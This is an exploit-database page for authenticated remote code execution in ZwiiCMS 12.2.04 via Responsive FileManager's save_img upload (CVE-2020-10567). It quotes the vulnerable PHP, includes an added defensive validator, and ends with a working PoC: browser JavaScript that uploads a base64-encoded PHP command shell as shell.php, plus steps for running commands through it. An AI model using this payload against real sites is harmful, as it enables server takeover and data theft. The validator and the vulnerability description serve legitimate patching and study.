| Title | Published | Views | Reporter |
|---|---|---|---|
| Exploit for Improper Input Validation in Tecrail Responsive_Filemanager | 26 Mar 2026 11:18 | – | githubexploit |
| ZwiiCMS 12.2.04 Remote Code Execution Exploit | 7 Mar 2023 00:00 | – | zdt |
| Tecrail Responsive FileManager Input Validation Error Vulnerability | 17 Mar 2020 00:00 | – | cnvd |
| CVE-2020-10567 | 14 Mar 2020 00:00 | – | cve |
| CVE-2020-10567 | 14 Mar 2020 00:00 | – | cvelist |
| CVE-2020-10567 | 14 Mar 2020 14:15 | – | nvd |
| ZwiiCMS 12.2.04 Remote Code Execution | 7 Mar 2023 00:00 | – | packetstorm |
| Code injection | 14 Mar 2020 14:15 | – | prion |
| PT-2020-3996 · Unknown · Responsive Filemanager | 14 Mar 2020 00:00 | – | ptsecurity |
| CVE-2020-10567 | 22 May 2025 17:39 | – | redhatcve |

# Exploit Title: ZwiiCMS 12.2.04 Remote Code Execution (Authenticated)
# Date: 03/06/2023
# Exploit Author: Hadi Mene
# Vendor Homepage: https://zwiicms.fr/
# Version: 12.2.04 and potentially lower versions
# Tested on: Linux
# CVE: CVE-2020-10567
# Category: webapps
ZwiiCMS 12.2.04 uses "Responsive FileManager" 9.14.0 for its file manager feature. ZwiiCMS is vulnerable to CVE-2020-10567 because
an authenticated user can use ajax_calls.php to upload a PHP file as base64-encoded data and gain remote code execution,
due to the lack of an extension check on the uploaded file.
Original CVE author : hackoclipse
https://github.com/trippo/ResponsiveFilemanager/issues/600
Vulnerable code (ajax_calls.php):
// There is no extension check on $_POST['name'], and the content of $_POST['url'] can be base64-decoded
// without necessarily being an image.
case 'save_img':
    $info = pathinfo($_POST['name']);
    $image_data = $_POST['url'];

    if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) {
        $image_data = substr($image_data, strpos($image_data, ',') + 1);
        $type = strtolower($type[1]); // jpg, png, gif

        $image_data = base64_decode($image_data);
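
A server-side check that would close the gap shown in the excerpt above, as an added example (not ResponsiveFilemanager or ZwiiCMS code). The function name validate_save_img(), the extension allowlist and the one-dot filename rule are assumptions, and the sample inputs are constructed.

```php
<?php
// Added example; validate_save_img() and the allowlist are hypothetical, not project code.
// Each allowed extension maps to the image type the decoded bytes must really be.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => IMAGETYPE_JPEG,
    'jpeg' => IMAGETYPE_JPEG,
    'png'  => IMAGETYPE_PNG,
    'gif'  => IMAGETYPE_GIF,
];

// Returns the decoded image bytes if name and payload both validate, otherwise null.
function validate_save_img(string $name, string $dataUrl): ?string
{
    // Reject directory components and multi-dot names such as "x.php.jpg".
    if ($name !== basename($name) || substr_count($name, '.') !== 1) {
        return null;
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_IMAGE_TYPES)) {
        return null; // a name ending in ".php" stops here
    }
    // The data-URL label is only a format check; it proves nothing about the content.
    if (!preg_match('/^data:image\/\w+;base64,/', $dataUrl)) {
        return null;
    }
    // Strict mode: fail on characters outside the base64 alphabet.
    $bytes = base64_decode(substr($dataUrl, strpos($dataUrl, ',') + 1), true);
    if ($bytes === false || $bytes === '') {
        return null;
    }
    // Trust the decoded bytes, not the label: they must parse as the image type the extension claims.
    $info = @getimagesizefromstring($bytes);
    if ($info === false || $info[2] !== ALLOWED_IMAGE_TYPES[$ext]) {
        return null;
    }
    return $bytes;
}

// Constructed inputs: a PHP file name with a placeholder payload, and a 1x1 GIF.
$gif = 'data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7';
var_dump(validate_save_img('shell.php', 'data:image/jpeg;base64,AAAA') === null);
var_dump(validate_save_img('pixel.gif', $gif) !== null);
var_dump(validate_save_img('pixel.png', $gif) === null); // extension and content disagree
```

The extension allowlist is what prevents the upload from being executed as PHP; disabling script execution in the upload directory is a separate layer on top of it.
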
PoC:
1) Log in to the administration panel.
2) Click on the folder icon at the top of the panel.
3) Open the Developer Tools for that page.
4) Copy, edit and execute the JavaScript code below.
5) Access your PHP shell at http://ZWIICMS_URL/site/file/source/shell.php?cmd=COMMAND
JavaScript code
######
function submitRequest()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https:\/\/192.168.0.27\/zwiicms\/core\/vendor\/filemanager\/ajax_calls.php?action=save_img", true);
    xhr.setRequestHeader("Accept", "*\/*");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
    xhr.withCredentials = true;
    var body = "url=data:image/jpeg;base64,PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pg==&path=&name=shell.php";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
submitRequest();
######